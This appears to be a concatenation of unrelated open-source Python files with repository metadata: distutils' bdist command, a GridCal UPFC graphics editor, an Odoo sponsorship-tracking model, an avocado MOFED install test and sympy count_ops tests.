"""distutils.command.bdist Implements the Distutils 'bdist' command (create a built [binary] distribution).""" __revision__ = "$Id$" import os from distutils.util import get_platform from distutils.core import Command from distutils.errors import DistutilsPlatformError, DistutilsOptionError def show_formats(): """Print list of available formats (arguments to "--format" option). """ from distutils.fancy_getopt import FancyGetopt formats = [] for format in bdist.format_commands: formats.append(("formats=" + format, None, bdist.format_command[format][1])) pretty_printer = FancyGetopt(formats) pretty_printer.print_help("List of available distribution formats:") class bdist(Command): description = "create a built (binary) distribution" user_options = [('bdist-base=', 'b', "temporary directory for creating built distributions"), ('plat-name=', 'p', "platform name to embed in generated filenames " "(default: %s)" % get_platform()), ('formats=', None, "formats for distribution (comma-separated list)"), ('dist-dir=', 'd', "directory to put final built distributions in " "[default: dist]"), ('skip-build', None, "skip rebuilding everything (for testing/debugging)"), ('owner=', 'u', "Owner name used when creating a tar file" " [default: current user]"), ('group=', 'g', "Group name used when creating a tar file" " [default: current group]"), ] boolean_options = ['skip-build'] help_options = [ ('help-formats', None, "lists available distribution formats", show_formats), ] # The following commands do not take a format option from bdist no_format_option = ('bdist_rpm',) # This won't do in reality: will need to distinguish RPM-ish Linux, # Debian-ish Linux, Solaris, FreeBSD, ..., Windows, Mac OS. default_format = {'posix': 'gztar', 'nt': 'zip', 'os2': 'zip'} # Establish the preferred order (for the --help-formats option). format_commands = ['rpm', 'gztar', 'bztar', 'ztar', 'tar', 'wininst', 'zip', 'msi'] # And the real information. format_command = {'rpm': ('bdist_rpm', "RPM distribution"), 'gztar': ('bdist_dumb', "gzip'ed tar file"), 'bztar': ('bdist_dumb', "bzip2'ed tar file"), 'ztar': ('bdist_dumb', "compressed tar file"), 'tar': ('bdist_dumb', "tar file"), 'wininst': ('bdist_wininst', "Windows executable installer"), 'zip': ('bdist_dumb', "ZIP file"), 'msi': ('bdist_msi', "Microsoft Installer") } def initialize_options(self): self.bdist_base = None self.plat_name = None self.formats = None self.dist_dir = None self.skip_build = 0 self.group = None self.owner = None def finalize_options(self): # have to finalize 'plat_name' before 'bdist_base' if self.plat_name is None: if self.skip_build: self.plat_name = get_platform() else: self.plat_name = self.get_finalized_command('build').plat_name # 'bdist_base' -- parent of per-built-distribution-format # temporary directories (eg. we'll probably have # "build/bdist.<plat>/dumb", "build/bdist.<plat>/rpm", etc.) if self.bdist_base is None: build_base = self.get_finalized_command('build').build_base self.bdist_base = os.path.join(build_base, 'bdist.' + self.plat_name) self.ensure_string_list('formats') if self.formats is None: try: self.formats = [self.default_format[os.name]] except KeyError: raise DistutilsPlatformError, \ "don't know how to create built distributions " + \ "on platform %s" % os.name if self.dist_dir is None: self.dist_dir = "dist" def run(self): # Figure out which sub-commands we need to run. commands = [] for format in self.formats: try: commands.append(self.format_command[format][0]) except KeyError: raise DistutilsOptionError, "invalid format '%s'" % format # Reinitialize and run each command. for i in range(len(self.formats)): cmd_name = commands[i] sub_cmd = self.reinitialize_command(cmd_name) if cmd_name not in self.no_format_option: sub_cmd.format = self.formats[i] # passing the owner and group names for tar archiving if cmd_name == 'bdist_dumb': sub_cmd.owner = self.owner sub_cmd.group = self.group # If we're going to need to run this command again, tell it to # keep its temporary files around so subsequent runs go faster. if cmd_name in commands[i+1:]: sub_cmd.keep_temp = 1 self.run_command(cmd_name)
gpl-3.0
SanPen/GridCal
src/GridCal/Gui/GridEditorWidget/upfc_graphics.py
1
19354
# This file is part of GridCal. # # GridCal is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # GridCal is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GridCal. If not, see <http://www.gnu.org/licenses/>. import numpy as np from GridCal.Gui.GridEditorWidget.generic_graphics import * from GridCal.Gui.GridEditorWidget.bus_graphics import TerminalItem from GridCal.Gui.GuiFunctions import BranchObjectModel from GridCal.Engine.Devices.upfc import UPFC from GridCal.Engine.Devices.branch import Branch, BranchType from GridCal.Engine.Simulations.Topology.topology_driver import reduce_grid_brute from GridCal.Gui.GridEditorWidget.messages import * class UpfcEditor(QDialog): def __init__(self, branch: UPFC, Sbase=100): """ Line Editor constructor :param branch: Branch object to update :param Sbase: Base power in MVA """ super(UpfcEditor, self).__init__() # keep pointer to the line object self.branch = branch self.Sbase = Sbase self.setObjectName("self") self.setContextMenuPolicy(Qt.NoContextMenu) self.layout = QVBoxLayout(self) # ------------------------------------------------------------------------------------------ # Set the object values # ------------------------------------------------------------------------------------------ Vf = self.branch.bus_from.Vnom Vt = self.branch.bus_to.Vnom Zbase = self.Sbase / (Vf * Vf) Ybase = 1 / Zbase R = self.branch.R * Zbase X = self.branch.X * Zbase G = self.branch.G * Ybase B = self.branch.B * Ybase I = self.branch.rate / Vf # current in kA # ------------------------------------------------------------------------------------------ # line length self.l_spinner = QDoubleSpinBox() self.l_spinner.setMinimum(0) self.l_spinner.setMaximum(9999999) self.l_spinner.setDecimals(6) self.l_spinner.setValue(1) # Max current self.i_spinner = QDoubleSpinBox() self.i_spinner.setMinimum(0) self.i_spinner.setMaximum(9999999) self.i_spinner.setDecimals(2) self.i_spinner.setValue(I) # R self.r_spinner = QDoubleSpinBox() self.r_spinner.setMinimum(0) self.r_spinner.setMaximum(9999999) self.r_spinner.setDecimals(6) self.r_spinner.setValue(R) # X self.x_spinner = QDoubleSpinBox() self.x_spinner.setMinimum(0) self.x_spinner.setMaximum(9999999) self.x_spinner.setDecimals(6) self.x_spinner.setValue(X) # G self.g_spinner = QDoubleSpinBox() self.g_spinner.setMinimum(0) self.g_spinner.setMaximum(9999999) self.g_spinner.setDecimals(6) self.g_spinner.setValue(G) # B self.b_spinner = QDoubleSpinBox() self.b_spinner.setMinimum(0) self.b_spinner.setMaximum(9999999) self.b_spinner.setDecimals(6) self.b_spinner.setValue(B) # accept button self.accept_btn = QPushButton() self.accept_btn.setText('Accept') self.accept_btn.clicked.connect(self.accept_click) # labels # add all to the GUI self.layout.addWidget(QLabel("L: Line length [Km]")) self.layout.addWidget(self.l_spinner) self.layout.addWidget(QLabel("Imax: Max. current [KA] @" + str(int(Vf)) + " [KV]")) self.layout.addWidget(self.i_spinner) self.layout.addWidget(QLabel("R: Resistance [Ohm/Km]")) self.layout.addWidget(self.r_spinner) self.layout.addWidget(QLabel("X: Inductance [Ohm/Km]")) self.layout.addWidget(self.x_spinner) self.layout.addWidget(QLabel("G: Conductance [S/Km]")) self.layout.addWidget(self.g_spinner) self.layout.addWidget(QLabel("B: Susceptance [S/Km]")) self.layout.addWidget(self.b_spinner) self.layout.addWidget(self.accept_btn) self.setLayout(self.layout) self.setWindowTitle('Line editor') def accept_click(self): """ Set the values :return: """ l = self.l_spinner.value() I = self.i_spinner.value() R = self.r_spinner.value() * l X = self.x_spinner.value() * l G = self.g_spinner.value() * l B = self.b_spinner.value() * l Vf = self.branch.bus_from.Vnom Vt = self.branch.bus_to.Vnom Sn = np.round(I * Vf, 2) # nominal power in MVA = kA * kV Zbase = self.Sbase / (Vf * Vf) Ybase = 1.0 / Zbase self.branch.R = np.round(R / Zbase, 6) self.branch.X = np.round(X / Zbase, 6) self.branch.G = np.round(G / Ybase, 6) self.branch.B = np.round(B / Ybase, 6) self.branch.rate = Sn self.accept() class UpfcGraphicItem(QGraphicsLineItem): def __init__(self, fromPort: TerminalItem, toPort: TerminalItem, diagramScene, width=5, branch: UPFC = None): """ :param fromPort: :param toPort: :param diagramScene: :param width: :param branch: """ QGraphicsLineItem.__init__(self, None) self.api_object = branch if self.api_object is not None: if self.api_object.active: self.style = ACTIVE['style'] self.color = ACTIVE['color'] else: self.style = DEACTIVATED['style'] self.color = DEACTIVATED['color'] else: self.style = OTHER['style'] self.color = OTHER['color'] self.width = width self.pen_width = width self.setPen(QPen(self.color, self.width, self.style)) self.setFlag(self.ItemIsSelectable, True) self.setCursor(QCursor(Qt.PointingHandCursor)) self.pos1 = None self.pos2 = None self.fromPort = None self.toPort = None self.diagramScene = diagramScene if fromPort: self.setFromPort(fromPort) if toPort: self.setToPort(toPort) # add transformer circles h = 48 w = h self.symbol = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self) if self.api_object is not None: self.update_symbol() # add the line and it possible children to the scene self.diagramScene.addItem(self) if fromPort and toPort: self.redraw() def set_colour(self, color: QColor, w, style: Qt.PenStyle): """ Set color and style :param color: QColor instance :param w: width :param style: PenStyle instance :return: """ self.setPen(QPen(color, w, style)) self.symbol.setPen(QPen(color, w, style)) self.symbol.setBrush(color) def remove_symbol(self): """ Remove all symbols """ for elm in [self.symbol]: if elm is not None: try: self.diagramScene.removeItem(elm) except: pass def update_symbol(self): """ Make the branch symbol """ # remove the symbol of the branch self.remove_symbol() self.make_vsc_symbol() def make_vsc_symbol(self): """ Make the VSC symbol """ h = 48 w = h self.symbol = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self) self.symbol.setPen(QPen(self.color, self.width, self.style)) graphic = QGraphicsRectItem(QRectF(0, 0, w, h), parent=self.symbol) graphic.setBrush(QBrush(QPixmap(":/Icons/icons/upfc.svg"))) graphic.setPen(QPen(Qt.transparent, self.width, self.style)) if self.api_object.active: self.symbol.setBrush(self.color) else: self.symbol.setBrush(QBrush(Qt.white)) def setToolTipText(self, toolTip: str): """ Set branch tool tip text Args: toolTip: text """ self.setToolTip(toolTip) if self.symbol is not None: self.symbol.setToolTip(toolTip) def contextMenuEvent(self, event): """ Show context menu @param event: @return: """ if self.api_object is not None: menu = QMenu() pe = menu.addAction('Enable/Disable') pe_icon = QIcon() if self.api_object.active: pe_icon.addPixmap(QPixmap(":/Icons/icons/uncheck_all.svg")) else: pe_icon.addPixmap(QPixmap(":/Icons/icons/check_all.svg")) pe.setIcon(pe_icon) pe.triggered.connect(self.enable_disable_toggle) menu.addSeparator() ra2 = menu.addAction('Delete') del_icon = QIcon() del_icon.addPixmap(QPixmap(":/Icons/icons/delete3.svg")) ra2.setIcon(del_icon) ra2.triggered.connect(self.remove) menu.addSeparator() ra3 = menu.addAction('Edit') edit_icon = QIcon() edit_icon.addPixmap(QPixmap(":/Icons/icons/edit.svg")) ra3.setIcon(edit_icon) ra3.triggered.connect(self.edit) menu.addSeparator() ra6 = menu.addAction('Plot profiles') plot_icon = QIcon() plot_icon.addPixmap(QPixmap(":/Icons/icons/plot.svg")) ra6.setIcon(plot_icon) ra6.triggered.connect(self.plot_profiles) ra4 = menu.addAction('Assign rate to profile') ra4_icon = QIcon() ra4_icon.addPixmap(QPixmap(":/Icons/icons/assign_to_profile.svg")) ra4.setIcon(ra4_icon) ra4.triggered.connect(self.assign_rate_to_profile) ra5 = menu.addAction('Assign active state to profile') ra5_icon = QIcon() ra5_icon.addPixmap(QPixmap(":/Icons/icons/assign_to_profile.svg")) ra5.setIcon(ra5_icon) ra5.triggered.connect(self.assign_status_to_profile) menu.addSeparator() re = menu.addAction('Reduce') re_icon = QIcon() re_icon.addPixmap(QPixmap(":/Icons/icons/grid_reduction.svg")) re.setIcon(re_icon) re.triggered.connect(self.reduce) menu.exec_(event.screenPos()) else: pass def mousePressEvent(self, QGraphicsSceneMouseEvent): """ mouse press: display the editor :param QGraphicsSceneMouseEvent: :return: """ mdl = BranchObjectModel([self.api_object], self.api_object.editable_headers, parent=self.diagramScene.parent().object_editor_table, editable=True, transposed=True, non_editable_attributes=self.api_object.non_editable_attributes) self.diagramScene.parent().object_editor_table.setModel(mdl) def mouseDoubleClickEvent(self, event): """ On double click, edit :param event: :return: """ if self.api_object.branch_type in [BranchType.Transformer, BranchType.Line]: # trigger the editor self.edit() elif self.api_object.branch_type is BranchType.Switch: # change state self.enable_disable_toggle() def remove(self): """ Remove this object in the diagram and the API @return: """ ok = yes_no_question('Do you want to remove this UPFC?', 'Remove UPFC') if ok: self.diagramScene.circuit.delete_branch(self.api_object) self.diagramScene.removeItem(self) def reduce(self): """ Reduce this branch """ ok = yes_no_question('Do you want to reduce this UPFC?', 'Remove UPFC') if ok: # get the index of the branch br_idx = self.diagramScene.circuit.branches.index(self.api_object) # call the reduction routine removed_branch, removed_bus, \ updated_bus, updated_branches = reduce_grid_brute(self.diagramScene.circuit, br_idx) # remove the reduced branch removed_branch.graphic_obj.remove_symbol() self.diagramScene.removeItem(removed_branch.graphic_obj) # update the buses (the deleted one and the updated one) if removed_bus is not None: # merge the removed bus with the remaining one updated_bus.graphic_obj.merge(removed_bus.graphic_obj) # remove the updated bus children for g in updated_bus.graphic_obj.shunt_children: self.diagramScene.removeItem(g.nexus) self.diagramScene.removeItem(g) # re-draw the children updated_bus.graphic_obj.create_children_icons() # remove bus for g in removed_bus.graphic_obj.shunt_children: self.diagramScene.removeItem(g.nexus) # remove the links between the bus and the children self.diagramScene.removeItem(removed_bus.graphic_obj) # remove the bus and all the children contained for br in updated_branches: # remove the branch from the schematic self.diagramScene.removeItem(br.graphic_obj) # add the branch to the schematic with the rerouting and all self.diagramScene.parent_.add_line(br) # update both buses br.bus_from.graphic_obj.update() br.bus_to.graphic_obj.update() def remove_widget(self): """ Remove this object in the diagram @return: """ self.diagramScene.removeItem(self) def enable_disable_toggle(self): """ @return: """ if self.api_object is not None: if self.api_object.active: self.set_enable(False) else: self.set_enable(True) def set_enable(self, val=True): """ Set the enable value, graphically and in the API @param val: @return: """ self.api_object.active = val if self.api_object is not None: if self.api_object.active: self.style = ACTIVE['style'] self.color = ACTIVE['color'] else: self.style = DEACTIVATED['style'] self.color = DEACTIVATED['color'] else: self.style = OTHER['style'] self.color = OTHER['color'] # Switch coloring if self.symbol_type == BranchType.Switch: if self.api_object.active: self.symbol.setBrush(self.color) else: self.symbol.setBrush(Qt.white) if self.symbol_type == BranchType.DCLine: self.symbol.setBrush(self.color) if self.api_object.active: self.symbol.setPen(QPen(ACTIVE['color'])) else: self.symbol.setPen(QPen(DEACTIVATED['color'])) # Set pen for everyone self.set_pen(QPen(self.color, self.width, self.style)) def plot_profiles(self): """ Plot the time series profiles @return: """ i = self.diagramScene.circuit.get_branches().index(self.api_object) self.diagramScene.plot_branch(i, self.api_object) def setFromPort(self, fromPort): """ Set the From terminal in a connection @param fromPort: @return: """ self.fromPort = fromPort if self.fromPort: self.pos1 = fromPort.scenePos() self.fromPort.posCallbacks.append(self.setBeginPos) self.fromPort.parent.setZValue(0) def setToPort(self, toPort): """ Set the To terminal in a connection @param toPort: @return: """ self.toPort = toPort if self.toPort: self.pos2 = toPort.scenePos() self.toPort.posCallbacks.append(self.setEndPos) self.toPort.parent.setZValue(0) def setEndPos(self, endpos): """ Set the starting position @param endpos: @return: """ self.pos2 = endpos self.redraw() def setBeginPos(self, pos1): """ Set the starting position @param pos1: @return: """ self.pos1 = pos1 self.redraw() def redraw(self): """ Redraw the line with the given positions @return: """ if self.pos1 is not None and self.pos2 is not None: # Set position self.setLine(QLineF(self.pos1, self.pos2)) # set Z-Order (to the back) self.setZValue(-1) if self.api_object is not None: # if the branch has a moveable symbol, move it try: h = self.pos2.y() - self.pos1.y() b = self.pos2.x() - self.pos1.x() ang = np.arctan2(h, b) h2 = self.symbol.rect().height() / 2.0 w2 = self.symbol.rect().width() / 2.0 a = h2 * np.cos(ang) - w2 * np.sin(ang) b = w2 * np.sin(ang) + h2 * np.cos(ang) center = (self.pos1 + self.pos2) * 0.5 - QPointF(a, b) transform = QTransform() transform.translate(center.x(), center.y()) transform.rotate(np.rad2deg(ang)) self.symbol.setTransform(transform) except Exception as ex: print(ex) def set_pen(self, pen): """ Set pen to all objects Args: pen: """ self.setPen(pen) if self.symbol is not None: self.symbol.setPen(pen) def edit(self): """ Open the appropriate editor dialogue :return: """ Sbase = self.diagramScene.circuit.Sbase dlg = UpfcEditor(self.api_object, Sbase) if dlg.exec_(): pass def add_to_templates(self): """ Open the appropriate editor dialogue :return: """ Sbase = self.diagramScene.circuit.Sbase dlg = UpfcEditor(self.api_object, Sbase) if dlg.exec_(): pass def assign_rate_to_profile(self): """ Assign the snapshot rate to the profile """ self.diagramScene.set_rate_to_profile(self.api_object) def assign_status_to_profile(self): """ Assign the snapshot rate to the profile """ self.diagramScene.set_active_status_to_profile(self.api_object)
gpl-3.0
Secheron/compassion-modules
sponsorship_tracking/model/contracts.py
2
12602
# -*- encoding: utf-8 -*- ############################################################################## # # Copyright (C) 2015 Compassion CH (http://www.compassion.ch) # Releasing children from poverty in Jesus' name # @author: David Coninckx, Emanuel Cino # # The licence is in the file __openerp__.py # ############################################################################## from openerp import api, models, fields, exceptions, _ from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DF from datetime import datetime, date, timedelta import logging logger = logging.getLogger(__name__) class recurring_contract(models.Model): _inherit = "recurring.contract" ########################################################################## # FIELDS # ########################################################################## sds_state = fields.Selection( '_get_sds_states', 'SDS Status', readonly=True, track_visibility='onchange', select=True, copy=False) sds_state_date = fields.Date( 'SDS state date', readonly=True, copy=False) project_id = fields.Many2one( 'compassion.project', 'Project', related='child_id.project_id', readonly=True) project_state = fields.Selection( '_get_project_states', 'Project Status', select=True, readonly=True, track_visibility='onchange') color = fields.Integer('Color Index') no_sub_reason = fields.Char('No sub reason') sds_uid = fields.Many2one( 'res.users', 'SDS Follower', default=lambda self: self.env.user) ########################################################################## # FIELDS METHODS # ########################################################################## def _get_sds_states(self): return [ ('draft', _('Draft')), ('start', _('Start')), ('waiting_welcome', _('Waiting welcome')), ('active', _('Active')), ('field_memo', _('Field memo')), ('sub_waiting', _('Sub waiting')), ('sub', _('Sub')), ('sub_accept', _('Sub Accept')), ('sub_reject', _('Sub Reject')), ('inform_no_sub', _('Inform No sub')), ('no_sub', _('No sub')), ('cancelled', _('Cancelled')) ] def _get_project_states(self): return [ ('active', _('Active')), ('inform_suspended', _('Inform fund suspension')), ('fund-suspended', _('Fund Suspended')), ('inform_reactivation', _('Inform reactivation')), ('inform_extension', _('Inform extension')), ('inform_suspended_reactivation', _('Inform suspended and reactivation')), ('inform_project_terminated', _('Inform project terminated')), ('phase_out', _('Phase out')), ('terminated', _('Terminated')) ] ########################################################################## # ORM METHODS # ########################################################################## @api.multi def write(self, vals): if 'sds_state' in vals: vals['sds_state_date'] = date.today().strftime(DF) if 'parent_id' in vals: self._parent_id_changed(vals['parent_id']) return super(recurring_contract, self).write(vals) ########################################################################## # VIEW CALLBACKS # ########################################################################## # Kanban Buttons ################ @api.model def button_mail_sent(self, value): """Button in Kanban view calling action on all contracts of one group. """ contracts = self.search([('sds_state', '=', value)]) contracts.signal_workflow('mail_sent') return True @api.model def button_project_mail_sent(self, value): """Button in Kanban view calling action on all contracts of one group. """ contracts = self.search([('project_state', '=', value)]) contracts.signal_workflow('project_mail_sent') return True @api.model def button_reset_gmc_state(self, value): """ Button called from Kanban view on all contracts of one group. """ contracts = self.search([('gmc_state', '=', value)]) return contracts.reset_gmc_state() # CRON Methods ############## @api.model def check_sub_duration(self): """ Check all sponsorships in SUB State. After 50 days SUB Sponsorship started, Sponsorship becomes : - SUB Accept if SUB sponsorship is active - SUB Reject otherwise """ fifty_days_ago = date.today() + timedelta(days=-50) contracts = self.search([('sds_state', '=', 'sub')]) for contract in contracts: transition = 'sub_reject' sub_sponsorships = self.search([('parent_id', '=', contract.id)]) if sub_sponsorships: for sub_contract in sub_sponsorships: if sub_contract.state == 'active' or \ sub_contract.end_reason == 1: transition = 'sub_accept' break contract.write({'color': 5 if transition == 'sub_accept' else 2}) sub_start_date = datetime.strptime( sub_contract.start_date, DF).date() if sub_start_date < fifty_days_ago: contract.signal_workflow(transition) return True @api.model def check_waiting_welcome_duration(self): """ Check all sponsorships in Waiting Welcome state. Put them in light green color after 10 days, indicating the mailing should be sent. """ ten_days_ago = date.today() + timedelta(days=-10) contracts = self.search([ ('sds_state_date', '<', ten_days_ago), ('sds_state', '=', 'waiting_welcome')]) return contracts.write({'color': 4}) @api.model def end_workflow(self): """ Terminate all workflows related to inactive contracts. """ inactive_contracts = self.search([ ('sds_state', 'in', ['cancelled', 'no_sub', 'sub_accept', 'sub_reject']), ('state', 'in', ['terminated', 'cancelled'])]) inactive_contracts.delete_workflow() return True # Other view callbacks ###################### @api.onchange('partner_id') def on_change_partner_id(self): """ Find parent sponsorship if any is sub_waiting. """ super(recurring_contract, self).on_change_partner_id() if 'S' in self.type: origin_id = self.env['recurring.contract.origin'].search( [('type', '=', 'sub')]).ids[0] correspondant_id = self.correspondant_id.id parent_id = self._define_parent_id(correspondant_id) if parent_id and self.state == 'draft': self.parent_id = parent_id self.origin_id = origin_id @api.multi def switch_contract_view(self): ir_model_data = self.env['ir.model.data'] view_id = ir_model_data.get_object_reference( 'sponsorship_tracking', self.env.context['view_id'])[1] return { 'view_type': 'form', 'view_mode': 'form', 'views': [(view_id, 'form')], 'res_model': self._name, 'type': 'ir.actions.act_window', 'target': 'current', "res_id": self.ids[0], } @api.multi def mail_sent(self): return self.signal_workflow('mail_sent') @api.multi def project_mail_sent(self): return self.signal_workflow('project_mail_sent') # KANBAN GROUP METHODS ###################### @api.model def sds_kanban_groups(self, ids, domain, **kwargs): fold = { 'active': True, 'sub_accept': True, 'sub_reject': True, 'no_sub': True, 'cancelled': True } sds_states = self._get_sds_states() display_states = list() for sds_state in sds_states: sponsorship_count = self.search_count([ ('sds_state', '=', sds_state[0])]) if sponsorship_count: display_states.append(sds_state) return display_states, fold @api.model def _read_group_fill_results(self, domain, groupby, remaining_groupbys, aggregated_fields, count_field, read_group_result, read_group_order=None): """ The method seems to support grouping using m2o fields only, while we want to group by a simple status field. Hence the code below - it replaces simple status values with (value, name) tuples. """ if groupby == 'sds_state': state_dict = dict(self._get_sds_states()) for result in read_group_result: state = result[groupby] result[groupby] = (state, state_dict.get(state)) return super(recurring_contract, self)._read_group_fill_results( domain, groupby, remaining_groupbys, aggregated_fields, count_field, read_group_result, read_group_order ) _group_by_full = { 'sds_state': sds_kanban_groups, } ########################################################################## # WORKFLOW METHODS # ########################################################################## @api.multi def contract_validation(self): for contract in self: if contract.parent_id: logger.info("Contract " + str(contract.id) + " contract sub.") contract.parent_id.signal_workflow('new_contract_validated') return True @api.multi def contract_cancelled(self): """ Project state is no more relevant when contract is cancelled. """ res = super(recurring_contract, self).contract_cancelled() self.write({'project_state': False}) return res @api.multi def contract_terminated(self): """ Project state is no more relevant when contract is terminated. We also put the person who terminated the contract as follower. """ res = super(recurring_contract, self).contract_terminated() self.write({'project_state': False, 'sds_uid': self.env.user.id}) return res ########################################################################## # PRIVATE METHODS # ########################################################################## def _define_parent_id(self, correspondant_id): same_partner_contracts = self.search( [('correspondant_id', '=', correspondant_id), ('sds_state', '=', 'sub_waiting')]) for same_partner_contract in same_partner_contracts: if not self.search_count([ ('parent_id', '=', same_partner_contract.id)]): return same_partner_contract.id return False def _parent_id_changed(self, parent_id): """ If contract is already validated and parent is sub_waiting, mark the sub. """ for contract in self: if 'S' in contract.type and contract.state != 'draft': if contract.parent_id: raise exceptions.Warning( _("Operation Failure"), _("You cannot change the sub sponsorship.")) parent = self.browse(parent_id) if parent.sds_state == 'sub_waiting': parent.signal_workflow('new_contract_validated')
agpl-3.0
apahim/avocado-misc-tests
io/net/infiniband/mofed_install_test.py
1
2704
#!/usr/bin/env python # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # # See LICENSE for more details. # # Copyright: 2016 IBM # Author: Narasimhan V <sim@linux.vnet.ibm.com> """ MOFED Install Test """ import os from avocado import Test from avocado import main from avocado.utils import process class MOFEDInstallTest(Test): """ This test verifies the installation of MOFED iso with different combinations of input parameters, as specified in multiplexer file. """ def setUp(self): """ Mount MOFED iso. """ self.iso_location = self.params.get('iso_location', default='') if self.iso_location is '': self.skip("No ISO location given") self.option = self.params.get('option', default='') self.uninstall_flag = self.params.get('uninstall', default=True) self.iso = self.fetch_asset(self.iso_location, expire='10d') cmd = "mount -o loop %s %s" % (self.iso, self.srcdir) process.run(cmd, shell=True) self.pwd = os.getcwd() def install(self): """ Installs MOFED with given options. """ self.log.info("Starting installation") os.chdir(self.srcdir) cmd = './mlnxofedinstall %s --force' % self.option if process.system(cmd, ignore_status=True, shell=True): self.fail("Install Failed with %s" % self.option) def uninstall(self): """ Uninstalls MOFED, if installed fine. """ self.log.info("Starting uninstallation") cmd = "/etc/init.d/openibd restart" if not process.system(cmd, ignore_status=True, shell=True): return cmd = "ibstat" if not process.system(cmd, ignore_status=True, shell=True): return cmd = './uninstall.sh --force' if process.system(cmd, ignore_status=True, shell=True): self.fail("Uninstall Failed") def test(self): """ Tests install and uninstall of MOFED. """ self.install() if self.uninstall_flag: self.uninstall() def tearDown(self): """ Clean up """ os.chdir(self.pwd) cmd = "umount %s" % self.srcdir process.run(cmd, shell=True) if __name__ == "__main__": main()
gpl-2.0
jaimahajan1997/sympy
sympy/core/tests/test_count_ops.py
36
4575
from sympy import symbols, sin, exp, cos, Derivative, Integral, Basic, \ count_ops, S, And, I, pi, Eq, Or, Not, Xor, Nand, Nor, Implies, \ Equivalent, MatrixSymbol, Symbol, ITE from sympy.core.containers import Tuple x, y, z = symbols('x,y,z') a, b, c = symbols('a,b,c') def test_count_ops_non_visual(): def count(val): return count_ops(val, visual=False) assert count(x) == 0 assert count(x) is not S.Zero assert count(x + y) == 1 assert count(x + y) is not S.One assert count(x + y*x + 2*y) == 4 assert count({x + y: x}) == 1 assert count({x + y: S(2) + x}) is not S.One assert count(Or(x,y)) == 1 assert count(And(x,y)) == 1 assert count(Not(x)) == 1 assert count(Nor(x,y)) == 2 assert count(Nand(x,y)) == 2 assert count(Xor(x,y)) == 1 assert count(Implies(x,y)) == 1 assert count(Equivalent(x,y)) == 1 assert count(ITE(x,y,z)) == 1 assert count(ITE(True,x,y)) == 0 def test_count_ops_visual(): ADD, MUL, POW, SIN, COS, EXP, AND, D, G = symbols( 'Add Mul Pow sin cos exp And Derivative Integral'.upper()) DIV, SUB, NEG = symbols('DIV SUB NEG') NOT, OR, AND, XOR, IMPLIES, EQUIVALENT, ITE, BASIC, TUPLE = symbols( 'Not Or And Xor Implies Equivalent ITE Basic Tuple'.upper()) def count(val): return count_ops(val, visual=True) assert count(7) is S.Zero assert count(S(7)) is S.Zero assert count(-1) == NEG assert count(-2) == NEG assert count(S(2)/3) == DIV assert count(pi/3) == DIV assert count(-pi/3) == DIV + NEG assert count(I - 1) == SUB assert count(1 - I) == SUB assert count(1 - 2*I) == SUB + MUL assert count(x) is S.Zero assert count(-x) == NEG assert count(-2*x/3) == NEG + DIV + MUL assert count(1/x) == DIV assert count(1/(x*y)) == DIV + MUL assert count(-1/x) == NEG + DIV assert count(-2/x) == NEG + DIV assert count(x/y) == DIV assert count(-x/y) == NEG + DIV assert count(x**2) == POW assert count(-x**2) == POW + NEG assert count(-2*x**2) == POW + MUL + NEG assert count(x + pi/3) == ADD + DIV assert count(x + S(1)/3) == ADD + DIV assert count(x + y) == ADD assert count(x - y) == SUB assert count(y - x) == SUB assert count(-1/(x - y)) == DIV + NEG + SUB assert count(-1/(y - x)) == DIV + NEG + SUB assert count(1 + x**y) == ADD + POW assert count(1 + x + y) == 2*ADD assert count(1 + x + y + z) == 3*ADD assert count(1 + x**y + 2*x*y + y**2) == 3*ADD + 2*POW + 2*MUL assert count(2*z + y + x + 1) == 3*ADD + MUL assert count(2*z + y**17 + x + 1) == 3*ADD + MUL + POW assert count(2*z + y**17 + x + sin(x)) == 3*ADD + POW + MUL + SIN assert count(2*z + y**17 + x + sin(x**2)) == 3*ADD + MUL + 2*POW + SIN assert count(2*z + y**17 + x + sin( x**2) + exp(cos(x))) == 4*ADD + MUL + 2*POW + EXP + COS + SIN assert count(Derivative(x, x)) == D assert count(Integral(x, x) + 2*x/(1 + x)) == G + DIV + MUL + 2*ADD assert count(Basic()) is S.Zero assert count({x + 1: sin(x)}) == ADD + SIN assert count([x + 1, sin(x) + y, None]) == ADD + SIN + ADD assert count({x + 1: sin(x), y: cos(x) + 1}) == SIN + COS + 2*ADD assert count({}) is S.Zero assert count([x + 1, sin(x)*y, None]) == SIN + ADD + MUL assert count([]) is S.Zero assert count(Basic()) == 0 assert count(Basic(Basic(),Basic(x,x+y))) == ADD + 2*BASIC assert count(Basic(x, x + y)) == ADD + BASIC assert count(Or(x,y)) == OR assert count(And(x,y)) == AND assert count(And(x**y,z)) == AND + POW assert count(Or(x,Or(y,And(z,a)))) == AND + OR assert count(Nor(x,y)) == NOT + OR assert count(Nand(x,y)) == NOT + AND assert count(Xor(x,y)) == XOR assert count(Implies(x,y)) == IMPLIES assert count(Equivalent(x,y)) == EQUIVALENT assert count(ITE(x,y,z)) == ITE assert count([Or(x,y), And(x,y), Basic(x+y)]) == ADD + AND + BASIC + OR assert count(Basic(Tuple(x))) == BASIC + TUPLE #It checks that TUPLE is counted as an operation. assert count(Eq(x + y, S(2))) == ADD def test_issue_9324(): def count(val): return count_ops(val, visual=False) M = MatrixSymbol('M', 10, 10) assert count(M[0, 0]) == 0 assert count(2 * M[0, 0] + M[5, 7]) == 2 P = MatrixSymbol('P', 3, 3) Q = MatrixSymbol('Q', 3, 3) assert count(P + Q) == 3 m = Symbol('m', integer=True) n = Symbol('n', integer=True) M = MatrixSymbol('M', m + n, m * m) assert count(M[0, 1]) == 2
bsd-3-clause
neo4j-contrib/python-embedded
src/main/python/setup.py
1
1815
